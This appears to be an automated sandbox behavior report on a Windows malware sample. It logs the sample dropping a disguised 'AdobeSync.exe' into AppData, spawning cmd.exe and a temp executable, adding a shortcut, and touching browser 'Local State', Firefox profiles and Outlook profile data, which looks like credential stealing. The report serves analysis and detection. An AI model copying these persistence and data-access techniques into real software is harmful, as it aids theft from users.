Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory="Default"Jump to behavior
Source: C:\Users\user\AppData\Roaming\PatchReaderWCF\AdobeSync.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe C:\Users\user~1\AppData\Local\Temp\LocalCtrl_alpha_v3.exeJump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2044 --field-trial-handle=2008,i,10255780505562275753,1680696743736403,262144 /prefetch:3Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2392 --field-trial-handle=2056,i,9809617510510264235,7690938005942814254,262144 /prefetch:3
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=7160 --field-trial-handle=2056,i,9809617510510264235,7690938005942814254,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=7316 --field-trial-handle=2056,i,9809617510510264235,7690938005942814254,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --mojo-platform-channel-handle=7156 --field-trial-handle=2056,i,9809617510510264235,7690938005942814254,262144 /prefetch:8
Source: C:\Users\user\Desktop\LVkAi4PBv6.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\LVkAi4PBv6.exe Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\LVkAi4PBv6.exe Section loaded: msi.dll
Source: C:\Users\user\Desktop\LVkAi4PBv6.exe Section loaded: version.dll
Source: C:\Users\user\Desktop\LVkAi4PBv6.exe Section loaded: cabinet.dll
Source: C:\Users\user\Desktop\LVkAi4PBv6.exe Section loaded: msxml3.dll
Source: C:\Users\user\Desktop\LVkAi4PBv6.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\LVkAi4PBv6.exe Section loaded: wldp.dll
Source: C:\Users\user\Desktop\LVkAi4PBv6.exe Section loaded: feclient.dll
Source: C:\Users\user\Desktop\LVkAi4PBv6.exe Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\LVkAi4PBv6.exe Section loaded: apphelp.dll
Source: C:\Windows\Temp\{C5C6CF0D-9A4E-4872-8275-1B31F19D2062}\.cr\LVkAi4PBv6.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\Temp\{C5C6CF0D-9A4E-4872-8275-1B31F19D2062}\.cr\LVkAi4PBv6.exe Section loaded: cryptbase.dll
Source: C:\Windows\Temp\{C5C6CF0D-9A4E-4872-8275-1B31F19D2062}\.cr\LVkAi4PBv6.exe Section loaded: msi.dll
Source: C:\Windows\Temp\{C5C6CF0D-9A4E-4872-8275-1B31F19D2062}\.cr\LVkAi4PBv6.exe Section loaded: version.dll
Source: C:\Windows\Temp\{C5C6CF0D-9A4E-4872-8275-1B31F19D2062}\.cr\LVkAi4PBv6.exe Section loaded: cabinet.dll
Source: C:\Windows\Temp\{C5C6CF0D-9A4E-4872-8275-1B31F19D2062}\.cr\LVkAi4PBv6.exe Section loaded: msxml3.dll
Source: C:\Windows\Temp\{C5C6CF0D-9A4E-4872-8275-1B31F19D2062}\.cr\LVkAi4PBv6.exe Section loaded: windows.storage.dll
Source: C:\Windows\Temp\{C5C6CF0D-9A4E-4872-8275-1B31F19D2062}\.cr\LVkAi4PBv6.exe Section loaded: wldp.dll
Source: C:\Windows\Temp\{C5C6CF0D-9A4E-4872-8275-1B31F19D2062}\.cr\LVkAi4PBv6.exe Section loaded: feclient.dll
Source: C:\Windows\Temp\{C5C6CF0D-9A4E-4872-8275-1B31F19D2062}\.cr\LVkAi4PBv6.exe Section loaded: iertutil.dll
Source: C:\Windows\Temp\{C5C6CF0D-9A4E-4872-8275-1B31F19D2062}\.cr\LVkAi4PBv6.exe Section loaded: uxtheme.dll
Source: C:\Windows\Temp\{C5C6CF0D-9A4E-4872-8275-1B31F19D2062}\.cr\LVkAi4PBv6.exe Section loaded: textinputframework.dll
Source: C:\Windows\Temp\{C5C6CF0D-9A4E-4872-8275-1B31F19D2062}\.cr\LVkAi4PBv6.exe Section loaded: coreuicomponents.dll
Source: C:\Windows\Temp\{C5C6CF0D-9A4E-4872-8275-1B31F19D2062}\.cr\LVkAi4PBv6.exe Section loaded: coremessaging.dll
Source: C:\Windows\Temp\{C5C6CF0D-9A4E-4872-8275-1B31F19D2062}\.cr\LVkAi4PBv6.exe Section loaded: ntmarta.dll
Source: C:\Windows\Temp\{C5C6CF0D-9A4E-4872-8275-1B31F19D2062}\.cr\LVkAi4PBv6.exe Section loaded: wintypes.dll
Source: C:\Windows\Temp\{C5C6CF0D-9A4E-4872-8275-1B31F19D2062}\.cr\LVkAi4PBv6.exe Section loaded: apphelp.dll
Source: C:\Windows\Temp\{C8FC8EA1-BE1C-448C-9B0E-0B391DC1BF81}\.ba\AdobeSync.exe Section loaded: apphelp.dll
Source: C:\Windows\Temp\{C8FC8EA1-BE1C-448C-9B0E-0B391DC1BF81}\.ba\AdobeSync.exe Section loaded: axe8sharedexpat.dll
Source: C:\Windows\Temp\{C8FC8EA1-BE1C-448C-9B0E-0B391DC1BF81}\.ba\AdobeSync.exe Section loaded: bib.dll
Source: C:\Windows\Temp\{C8FC8EA1-BE1C-448C-9B0E-0B391DC1BF81}\.ba\AdobeSync.exe Section loaded: netapi32.dll
Source: C:\Windows\Temp\{C8FC8EA1-BE1C-448C-9B0E-0B391DC1BF81}\.ba\AdobeSync.exe Section loaded: sensapi.dll
Source: C:\Windows\Temp\{C8FC8EA1-BE1C-448C-9B0E-0B391DC1BF81}\.ba\AdobeSync.exe Section loaded: sqlite.dll
Source: C:\Windows\Temp\{C8FC8EA1-BE1C-448C-9B0E-0B391DC1BF81}\.ba\AdobeSync.exe Section loaded: wininet.dll
Source: C:\Windows\Temp\{C8FC8EA1-BE1C-448C-9B0E-0B391DC1BF81}\.ba\AdobeSync.exe Section loaded: mpr.dll
Source: C:\Windows\Temp\{C8FC8EA1-BE1C-448C-9B0E-0B391DC1BF81}\.ba\AdobeSync.exe Section loaded: srvcli.dll
Source: C:\Windows\Temp\{C8FC8EA1-BE1C-448C-9B0E-0B391DC1BF81}\.ba\AdobeSync.exe Section loaded: dbghelp.dll
Source: C:\Windows\Temp\{C8FC8EA1-BE1C-448C-9B0E-0B391DC1BF81}\.ba\AdobeSync.exe Section loaded: pla.dll
Source: C:\Windows\Temp\{C8FC8EA1-BE1C-448C-9B0E-0B391DC1BF81}\.ba\AdobeSync.exe Section loaded: pdh.dll
Source: C:\Windows\Temp\{C8FC8EA1-BE1C-448C-9B0E-0B391DC1BF81}\.ba\AdobeSync.exe Section loaded: tdh.dll
Source: C:\Windows\Temp\{C8FC8EA1-BE1C-448C-9B0E-0B391DC1BF81}\.ba\AdobeSync.exe Section loaded: cabinet.dll
Source: C:\Windows\Temp\{C8FC8EA1-BE1C-448C-9B0E-0B391DC1BF81}\.ba\AdobeSync.exe Section loaded: wevtapi.dll
Source: C:\Windows\Temp\{C8FC8EA1-BE1C-448C-9B0E-0B391DC1BF81}\.ba\AdobeSync.exe Section loaded: shdocvw.dll
Source: C:\Windows\Temp\{C8FC8EA1-BE1C-448C-9B0E-0B391DC1BF81}\.ba\AdobeSync.exe Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Roaming\PatchReaderWCF\AdobeSync.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\PatchReaderWCF\AdobeSync.exe Section loaded: axe8sharedexpat.dll
Source: C:\Users\user\AppData\Roaming\PatchReaderWCF\AdobeSync.exe Section loaded: bib.dll
Source: C:\Users\user\AppData\Roaming\PatchReaderWCF\AdobeSync.exe Section loaded: netapi32.dll
Source: C:\Users\user\AppData\Roaming\PatchReaderWCF\AdobeSync.exe Section loaded: sensapi.dll
Source: C:\Users\user\AppData\Roaming\PatchReaderWCF\AdobeSync.exe Section loaded: sqlite.dll
Source: C:\Users\user\AppData\Roaming\PatchReaderWCF\AdobeSync.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Roaming\PatchReaderWCF\AdobeSync.exe Section loaded: mpr.dll
Source: C:\Users\user\AppData\Roaming\PatchReaderWCF\AdobeSync.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Roaming\PatchReaderWCF\AdobeSync.exe Section loaded: dbghelp.dll
Source: C:\Users\user\AppData\Roaming\PatchReaderWCF\AdobeSync.exe Section loaded: pla.dll
Source: C:\Users\user\AppData\Roaming\PatchReaderWCF\AdobeSync.exe Section loaded: pdh.dll
Source: C:\Users\user\AppData\Roaming\PatchReaderWCF\AdobeSync.exe Section loaded: tdh.dll
Source: C:\Users\user\AppData\Roaming\PatchReaderWCF\AdobeSync.exe Section loaded: cabinet.dll
Source: C:\Users\user\AppData\Roaming\PatchReaderWCF\AdobeSync.exe Section loaded: wevtapi.dll
Source: C:\Users\user\AppData\Roaming\PatchReaderWCF\AdobeSync.exe Section loaded: shdocvw.dll
Source: C:\Users\user\AppData\Roaming\PatchReaderWCF\AdobeSync.exe Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: winbrand.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: linkinfo.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: ntshrui.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: cscapi.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: bitsproxy.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe Section loaded: shdocvw.dll
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe Section loaded: webio.dll
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Roaming\PatchReaderWCF\AdobeSync.exe Section loaded: axe8sharedexpat.dll
Source: C:\Users\user\AppData\Roaming\PatchReaderWCF\AdobeSync.exe Section loaded: bib.dll
Source: C:\Users\user\AppData\Roaming\PatchReaderWCF\AdobeSync.exe Section loaded: netapi32.dll
Source: C:\Users\user\AppData\Roaming\PatchReaderWCF\AdobeSync.exe Section loaded: sensapi.dll
Source: C:\Users\user\AppData\Roaming\PatchReaderWCF\AdobeSync.exe Section loaded: sqlite.dll
Source: C:\Users\user\AppData\Roaming\PatchReaderWCF\AdobeSync.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Roaming\PatchReaderWCF\AdobeSync.exe Section loaded: mpr.dll
Source: C:\Users\user\AppData\Roaming\PatchReaderWCF\AdobeSync.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Roaming\PatchReaderWCF\AdobeSync.exe Section loaded: dbghelp.dll
Source: C:\Users\user\AppData\Roaming\PatchReaderWCF\AdobeSync.exe Section loaded: pla.dll
Source: C:\Users\user\AppData\Roaming\PatchReaderWCF\AdobeSync.exe Section loaded: pdh.dll
Source: C:\Users\user\AppData\Roaming\PatchReaderWCF\AdobeSync.exe Section loaded: tdh.dll
Source: C:\Users\user\AppData\Roaming\PatchReaderWCF\AdobeSync.exe Section loaded: cabinet.dll
Source: C:\Users\user\AppData\Roaming\PatchReaderWCF\AdobeSync.exe Section loaded: wevtapi.dll
Source: C:\Users\user\AppData\Roaming\PatchReaderWCF\AdobeSync.exe Section loaded: shdocvw.dll
Source: C:\Users\user\AppData\Roaming\PatchReaderWCF\AdobeSync.exe Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: winbrand.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe Section loaded: shdocvw.dll
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe Section loaded: webio.dll
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\LVkAi4PBv6.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{F6D90F11-9C73-11D3-B32E-00C04F990BB4}\InProcServer32
Source: bgwf.5.dr LNK file: ..\..\..\..\user\AppData\Roaming\PatchReaderWCF\AdobeSync.exe
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: LVkAi4PBv6.exe Static file information: File size 7012811 > 1048576
Source: C:\Windows\Temp\{C8FC8EA1-BE1C-448C-9B0E-0B391DC1BF81}\.ba\AdobeSync.exe File opened: C:\Windows\Temp\{C8FC8EA1-BE1C-448C-9B0E-0B391DC1BF81}\.ba\msvcr90.dll
Source: LVkAi4PBv6.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: LVkAi4PBv6.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: LVkAi4PBv6.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: LVkAi4PBv6.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: LVkAi4PBv6.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: LVkAi4PBv6.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: LVkAi4PBv6.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: [C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\\CRX_INSTALL\content_scripts source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2121694138.0000000002E12000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2122038269.0000000002E1B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\profiles.ini source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2124211584.0000000002E22000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2121694138.0000000002E12000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2123111825.0000000002E20000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2122038269.0000000002E1B000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2142328136.0000000002E24000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2142540338.0000000002E2A000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\Local State source: LocalCtrl_alpha_v3.exe, 00000009.00000003.1843999096.0000000002E1C000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1845197320.0000000002E26000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1845099799.0000000002E20000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1844233653.0000000002E26000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1844975114.0000000002E1C000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1843391555.0000000002E28000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1845617901.0000000002E26000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1842862472.0000000002E28000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1844119867.0000000002E20000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1842148106.0000000002E1C000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\Local State source: LocalCtrl_alpha_v3.exe, 00000009.00000003.1843999096.0000000002E1C000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1845197320.0000000002E26000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1845099799.0000000002E20000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1844233653.0000000002E26000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1844975114.0000000002E1C000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1843391555.0000000002E28000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1845617901.0000000002E26000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1842862472.0000000002E28000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1844119867.0000000002E20000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.1842148106.0000000002E1C000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\ source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2121694138.0000000002E12000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2122038269.0000000002E1B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: ^\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2121694138.0000000002E12000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2122038269.0000000002E1B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: ntkrnlmp.pdb9 source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2122038269.0000000002E43000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2122266355.0000000002E43000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2121694138.0000000002E43000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: m\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\6 source: LocalCtrl_alpha_v3.exe, 00000009.00000002.2208471552.0000000002DE4000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: p\Symbols\ntkrnlmp.pdb source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2124211584.0000000002E22000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2121694138.0000000002E12000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2123111825.0000000002E20000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2122038269.0000000002E1B000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2142328136.0000000002E24000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: AdobeSync.exe, 00000003.00000002.1393806393.000000000A14C000.00000004.00000020.00020000.00000000.sdmp, AdobeSync.exe, 00000003.00000002.1394035216.000000000A4A0000.00000004.00000800.00020000.00000000.sdmp, AdobeSync.exe, 00000004.00000002.1458777606.000000000A457000.00000004.00000001.00020000.00000000.sdmp, AdobeSync.exe, 00000004.00000002.1458405144.0000000009D49000.00000004.00000020.00020000.00000000.sdmp, AdobeSync.exe, 00000004.00000002.1458581198.000000000A0A0000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1685225598.000000000462B000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1685843617.0000000004EF0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: >C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2121694138.0000000002E12000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: \Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2121694138.0000000002E12000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2122038269.0000000002E1B000.00000004.00000001.00020000.00000000.sdmp
